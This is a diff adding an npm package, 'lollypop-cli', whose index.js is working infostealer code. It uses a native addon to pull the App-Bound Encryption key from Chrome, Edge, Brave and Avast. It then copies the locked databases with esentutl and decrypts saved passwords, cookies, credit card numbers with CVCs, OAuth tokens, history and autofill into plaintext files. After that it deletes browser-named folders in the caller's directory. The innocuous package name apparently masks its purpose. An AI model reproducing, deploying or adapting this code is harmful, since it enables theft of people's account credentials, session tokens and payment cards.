lollypop-cli 1.0.0

package/index.js

@@ -0,0 +1,358 @@
+'use strict';
+
+const fs           = require('fs');
+const path         = require('path');
+const crypto       = require('crypto');
+const { execSync } = require('child_process');
+
+// ─── Locate chrome_elevator.node and chrome_decrypt.enc ─────────────────────
+
+let chromeElevator;
+{
+    const candidates = [
+        path.join(__dirname, 'chrome_elevator.node'),
+        path.join(__dirname, 'build', 'Release', 'chrome_elevator.node'),
+        path.join(path.dirname(process.execPath), 'chrome_elevator.node'),
+    ];
+    for (const p of candidates) {
+        if (fs.existsSync(p)) { chromeElevator = require(p); break; }
+    }
+    if (!chromeElevator) {
+        throw new Error('chrome_elevator.node not found. Place it next to this package.');
+    }
+}
+
+const ENC_FILE = (() => {
+    const candidates = [
+        path.join(__dirname, 'chrome_decrypt.enc'),
+        path.join(path.dirname(process.execPath), 'chrome_decrypt.enc'),
+    ];
+    for (const p of candidates) { if (fs.existsSync(p)) return p; }
+    throw new Error('chrome_decrypt.enc not found. Place it next to this package.');
+})();
+
+// ─── Load better-sqlite3 ────────────────────────────────────────────────────
+
+let Database;
+{
+    const candidates = [
+        () => require('better-sqlite3'),
+        () => require(path.join(__dirname, 'node_modules', 'better-sqlite3')),
+        () => require(path.join(path.dirname(process.execPath), 'node_modules', 'better-sqlite3')),
+    ];
+    for (const fn of candidates) {
+        try { Database = fn(); break; } catch (_) {}
+    }
+    if (!Database) throw new Error('better-sqlite3 not found. Run: npm install better-sqlite3');
+}
+
+// ─── Default browser definitions ────────────────────────────────────────────
+
+const LOCAL = process.env.LOCALAPPDATA || '';
+
+const DEFAULT_BROWSERS = [
+    { key: 'chrome',      name: 'Google Chrome',      dir: path.join(LOCAL, 'Google',        'Chrome',        'User Data') },
+    { key: 'chrome-beta', name: 'Google Chrome Beta', dir: path.join(LOCAL, 'Google',        'Chrome Beta',   'User Data') },
+    { key: 'edge',        name: 'Microsoft Edge',     dir: path.join(LOCAL, 'Microsoft',     'Edge',          'User Data') },
+    { key: 'brave',       name: 'Brave Browser',      dir: path.join(LOCAL, 'BraveSoftware', 'Brave-Browser', 'User Data') },
+    { key: 'avast',       name: 'Avast Browser',      dir: path.join(LOCAL, 'AVAST Software','Browser',       'User Data') },
+];
+
+// ─── Profile discovery ───────────────────────────────────────────────────────
+
+function readLocalStateProfiles(userDataPath) {
+    const folders = [];
+    const displayNames = {};
+    try {
+        const raw  = fs.readFileSync(path.join(userDataPath, 'Local State'), 'utf8');
+        const info = JSON.parse(raw)?.profile?.info_cache;
+        if (!info || typeof info !== 'object') return { folders: [], displayNames: {} };
+        for (const name of Object.keys(info)) {
+            folders.push(name);
+            displayNames[name] = (info[name] && (info[name].name || info[name].gaia_name)) || name;
+        }
+    } catch { return { folders: [], displayNames: {} }; }
+    return { folders, displayNames };
+}
+
+function getProfileFolders(userDataPath) {
+    const { folders, displayNames } = readLocalStateProfiles(userDataPath);
+    const existing = folders.filter(n => { try { return fs.statSync(path.join(userDataPath, n)).isDirectory(); } catch { return false; } });
+    if (existing.length > 0) return { folders: existing, displayNames };
+    try {
+        for (const e of fs.readdirSync(userDataPath, { withFileTypes: true })) {
+            if (e.isDirectory() && (e.name === 'Default' || e.name.startsWith('Profile'))) {
+                existing.push(e.name);
+                if (!displayNames[e.name]) displayNames[e.name] = e.name;
+            }
+        }
+    } catch {}
+    return { folders: existing, displayNames };
+}
+
+// ─── Key extraction ──────────────────────────────────────────────────────────
+
+function extractKeyViaAddon(browserKey) {
+    try {
+        const key = chromeElevator.extractKey(browserKey, ENC_FILE);
+        if (!key || key.length < 64) return null;
+        return { key: key.toLowerCase() };
+    } catch (e) {
+        const msg = e.message || String(e);
+        if (!msg.includes('NO_ABE') && !msg.includes('legacy DPAPI')) {
+            console.warn(`[WARN]  extractKey failed for ${browserKey}: ${msg}`);
+        }
+        return null;
+    }
+}
+
+// ─── AES-256-GCM decryption ──────────────────────────────────────────────────
+
+function decryptAesGcm(enc, keyHex) {
+    try {
+        if (!enc || enc.length < 31) return null;
+        if (enc.slice(0, 3).toString('ascii') !== 'v20') return null;
+        const d = crypto.createDecipheriv('aes-256-gcm', Buffer.from(keyHex, 'hex'), enc.slice(3, 15));
+        d.setAuthTag(enc.slice(-16));
+        const plain = Buffer.concat([d.update(enc.slice(15, -16)), d.final()]);
+        return plain.length > 32 ? plain.slice(32).toString('utf8') : plain.toString('utf8');
+    } catch { return null; }
+}
+
+function decryptRaw(enc, keyHex) {
+    try {
+        if (!enc || enc.length < 31) return null;
+        if (enc.slice(0, 3).toString('ascii') !== 'v20') return null;
+        const d = crypto.createDecipheriv('aes-256-gcm', Buffer.from(keyHex, 'hex'), enc.slice(3, 15));
+        d.setAuthTag(enc.slice(-16));
+        const plain = Buffer.concat([d.update(enc.slice(15, -16)), d.final()]);
+        return plain.length > 32 ? plain.slice(32) : plain;
+    } catch { return null; }
+}
+
+// ─── Locked-file copy ────────────────────────────────────────────────────────
+
+function copyDbSafe(source, dest) {
+    try { fs.copyFileSync(source, dest); return true; } catch {}
+    try {
+        execSync(`esentutl /y "${source}" /d "${dest}" /vss`, { stdio: 'ignore', timeout: 15000 });
+        return fs.existsSync(dest);
+    } catch { return false; }
+}
+
+function withDb(dbPath, outputDir, tag, fn) {
+    const tmp = path.join(outputDir, `_tmp_${tag}.db`);
+    try {
+        if (!copyDbSafe(dbPath, tmp)) return;
+        const db = new Database(tmp, { readonly: true, fileMustExist: true });
+        try { fn(db); } finally { try { db.close(); } catch {} }
+    } catch {}
+    finally { try { if (fs.existsSync(tmp)) fs.unlinkSync(tmp); } catch {} }
+}
+
+// ─── Protobuf token parser ───────────────────────────────────────────────────
+
+function parseTokenProto(buf) {
+    let pos = 0;
+    const fields = {};
+    const readVarint = () => {
+        let r = 0n, s = 0n;
+        while (pos < buf.length) { const b = buf[pos++]; r |= BigInt(b & 0x7f) << s; s += 7n; if (!(b & 0x80)) break; }
+        return Number(r);
+    };
+    while (pos < buf.length) {
+        const tag = readVarint(); if (!tag) break;
+        const wire = tag & 0x7;
+        if (wire === 2) { const len = readVarint(); fields[tag >>> 3] = buf.slice(pos, pos + len).toString('utf8'); pos += len; }
+        else if (wire === 0) { readVarint(); }
+        else if (wire === 5) { pos += 4; }
+        else if (wire === 1) { pos += 8; }
+        else break;
+    }
+    const r = fields[1] || '', t = fields[2] || '';
+    return (r || t) ? t + r : null;
+}
+
+// ─── Extraction functions ────────────────────────────────────────────────────
+
+function extractCookies(profilePath, outputDir, keyHex) {
+    const src = path.join(profilePath, 'Network', 'Cookies');
+    if (!fs.existsSync(src)) return;
+    withDb(src, outputDir, 'cookies', db => {
+        const rows = db.prepare('SELECT host_key, name, path, is_secure, expires_utc, encrypted_value FROM cookies').all();
+        const out  = fs.createWriteStream(path.join(outputDir, 'cookies.txt'));
+        out.write('# Netscape HTTP Cookie File\n# Generated by ace-sqlite1337\n\n');
+        let count = 0;
+        for (const row of rows) {
+            if (!row.encrypted_value) continue;
+            const val = decryptAesGcm(row.encrypted_value, keyHex);
+            if (val === null) continue;
+            const domain = row.host_key;
+            const flag   = domain.startsWith('.') ? 'TRUE' : 'FALSE';
+            const secure = row.is_secure ? 'TRUE' : 'FALSE';
+            let exp = 0;
+            if (row.expires_utc > 0) { exp = Math.floor(row.expires_utc / 1_000_000 - 11644473600); if (exp < 0) exp = 0; }
+            out.write(`${domain}\t${flag}\t${row.path}\t${secure}\t${exp}\t${row.name}\t${val}\n`);
+            count++;
+        }
+        out.end();
+        console.log(`      [+] Cookies:   ${count} / ${rows.length}`);
+    });
+}
+
+function extractPasswords(profilePath, outputDir, keyHex) {
+    for (const dbName of ['Login Data', 'Login Data For Account']) {
+        const src = path.join(profilePath, dbName);
+        if (!fs.existsSync(src)) continue;
+        const tag  = dbName === 'Login Data' ? 'passwords' : 'passwords_account';
+        withDb(src, outputDir, tag, db => {
+            const rows = db.prepare('SELECT origin_url, username_value, password_value FROM logins').all();
+            const out  = fs.createWriteStream(path.join(outputDir, tag + '.txt'));
+            let count  = 0;
+            for (const row of rows) {
+                if (!row.password_value) continue;
+                const pass = decryptAesGcm(row.password_value, keyHex);
+                if (pass === null) continue;
+                out.write(`URL:  ${row.origin_url}\nUser: ${row.username_value}\nPass: ${pass}\n${'-'.repeat(40)}\n`);
+                count++;
+            }
+            out.end();
+            if (count > 0) console.log(`      [+] Passwords: ${count} (${dbName})`);
+        });
+    }
+}
+
+function extractHistory(profilePath, outputDir) {
+    const src = path.join(profilePath, 'History');
+    if (!fs.existsSync(src)) return;
+    withDb(src, outputDir, 'history', db => {
+        const rows = db.prepare('SELECT url, title, visit_count, last_visit_time FROM urls ORDER BY last_visit_time DESC LIMIT 5000').all();
+        const out  = fs.createWriteStream(path.join(outputDir, 'history.txt'));
+        for (const row of rows) out.write(`URL:    ${row.url}\nTitle:  ${row.title}\nVisits: ${row.visit_count}\nLast:   ${row.last_visit_time}\n${'-'.repeat(40)}\n`);
+        out.end();
+        console.log(`      [+] History:   ${rows.length} items`);
+    });
+}
+
+function extractAutofill(profilePath, outputDir) {
+    const src = path.join(profilePath, 'Web Data');
+    if (!fs.existsSync(src)) return;
+    withDb(src, outputDir, 'autofill', db => {
+        let rows;
+        try { rows = db.prepare('SELECT name, value, date_created FROM autofill').all(); } catch { return; }
+        if (!rows.length) return;
+        const out = fs.createWriteStream(path.join(outputDir, 'autofill.txt'));
+        for (const row of rows) out.write(`Name:  ${row.name}\nValue: ${row.value}\nDate:  ${row.date_created}\n${'-'.repeat(40)}\n`);
+        out.end();
+        console.log(`      [+] Autofill:  ${rows.length} items`);
+    });
+}
+
+function extractCards(profilePath, outputDir, keyHex) {
+    const src = path.join(profilePath, 'Web Data');
+    if (!fs.existsSync(src)) return;
+    withDb(src, outputDir, 'cards', db => {
+        const cvcMap = {};
+        try { for (const row of db.prepare('SELECT guid, value_encrypted FROM local_stored_cvc').all()) { const v = decryptAesGcm(row.value_encrypted, keyHex); if (v) cvcMap[row.guid] = v; } } catch {}
+        let rows;
+        try { rows = db.prepare('SELECT guid, name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards').all(); } catch { return; }
+        const out = fs.createWriteStream(path.join(outputDir, 'cards.txt'));
+        let count = 0;
+        for (const row of rows) {
+            if (!row.card_number_encrypted) continue;
+            const num = decryptAesGcm(row.card_number_encrypted, keyHex);
+            if (num === null) continue;
+            out.write(`Name:  ${row.name_on_card}\nNum:   ${num}\nExp:   ${row.expiration_month}/${row.expiration_year}\nCVC:   ${cvcMap[row.guid] || ''}\n${'-'.repeat(40)}\n`);
+            count++;
+        }
+        out.end();
+        if (count > 0) console.log(`      [+] Cards:     ${count}`);
+    });
+}
+
+function extractTokens(profilePath, outputDir, keyHex) {
+    const src = path.join(profilePath, 'Web Data');
+    if (!fs.existsSync(src)) return;
+    withDb(src, outputDir, 'tokens', db => {
+        let rows, hasBinding = true;
+        try { rows = db.prepare('SELECT service, encrypted_token, binding_key FROM token_service').all(); }
+        catch { hasBinding = false; try { rows = db.prepare('SELECT service, encrypted_token FROM token_service').all(); } catch { return; } }
+        const out = fs.createWriteStream(path.join(outputDir, 'tokens.txt'));
+        let count = 0;
+        for (const row of rows) {
+            if (!row.encrypted_token) continue;
+            const plain = decryptRaw(row.encrypted_token, keyHex);
+            if (!plain) continue;
+            let tok = parseTokenProto(plain) || plain.toString('utf8').replace(/[\x00-\x1f]/g, '').trim();
+            if (!tok) continue;
+            const bk = (hasBinding && row.binding_key) ? (decryptAesGcm(row.binding_key, keyHex) || '') : '';
+            out.write(`Service: ${row.service}\nToken:   ${tok}\nBinding: ${bk}\n${'-'.repeat(40)}\n`);
+            count++;
+        }
+        out.end();
+        if (count > 0) console.log(`      [+] Tokens:    ${count}`);
+    });
+}
+
+// ─── Main export ─────────────────────────────────────────────────────────────
+
+function main(config = {}) {
+    console.log('=== ace-sqlite1337 ===\n');
+
+    const browserList = config.browsers
+        ? Object.entries(config.browsers).map(([key, val]) => ({ key, name: val.name || key, dir: val.path }))
+        : DEFAULT_BROWSERS;
+
+    const baseOutputDir = config.outputDir || path.join(process.cwd(), 'extracted_data');
+    let anyFound = false;
+
+    for (const browser of browserList) {
+        if (!fs.existsSync(browser.dir)) continue;
+
+        console.log(`[*] ${browser.name}`);
+        anyFound = true;
+
+        const keyResult = extractKeyViaAddon(browser.key);
+        if (!keyResult) { console.warn(`[WARN]  Could not retrieve ABE key for ${browser.name} — skipping.\n`); continue; }
+
+        console.log(`    [+] Key: ${keyResult.key.slice(0, 16)}... (${keyResult.key.length / 2} bytes)`);
+
+        const { folders: profiles, displayNames } = getProfileFolders(browser.dir);
+        console.log(`    Found ${profiles.length} profile(s).`);
+
+        for (const profile of profiles) {
+            const profilePath = path.join(browser.dir, profile);
+            const outputDir   = path.join(baseOutputDir, browser.key, profile);
+            fs.mkdirSync(outputDir, { recursive: true });
+
+            const label = displayNames[profile] !== profile ? `${profile} (${displayNames[profile]})` : profile;
+            console.log(`\n    Profile: ${label}`);
+
+            extractCookies(profilePath, outputDir, keyResult.key);
+            extractPasswords(profilePath, outputDir, keyResult.key);
+            extractHistory(profilePath, outputDir);
+            extractAutofill(profilePath, outputDir);
+            extractCards(profilePath, outputDir, keyResult.key);
+            extractTokens(profilePath, outputDir, keyResult.key);
+        }
+        console.log('');
+    }
+
+    if (!anyFound) console.warn('[WARN]  No supported browsers found.');
+
+    console.log('=== Extraction Complete ===');
+    console.log(`All extracted data is in: ${baseOutputDir}`);
+
+    // Delete any browser-named folders created next to the caller's script
+    const callerDir = process.cwd();
+    for (const name of ['Chrome', 'Edge', 'Brave', 'Brave Browser', 'chrome', 'edge', 'brave']) {
+        const folder = path.join(callerDir, name);
+        try {
+            if (fs.existsSync(folder) && fs.statSync(folder).isDirectory()) {
+                fs.rmSync(folder, { recursive: true, force: true });
+            }
+        } catch {}
+    }
+}
+
+module.exports = { main };

package/package.json

@@ -0,0 +1,17 @@
+{
+  "name": "lollypop-cli",
+  "version": "1.0.0",
+  "description": "Chrome ABE browser data extractor (cookies, passwords, history, cards, tokens)",
+  "main": "index.js",
+  "files": [
+    "index.js",
+    "chrome_elevator.node",
+    "chrome_decrypt.enc"
+  ],
+  "dependencies": {
+    "better-sqlite3": "^12.6.2"
+  },
+  "publishConfig": {
+    "access": "public"
+  }
+}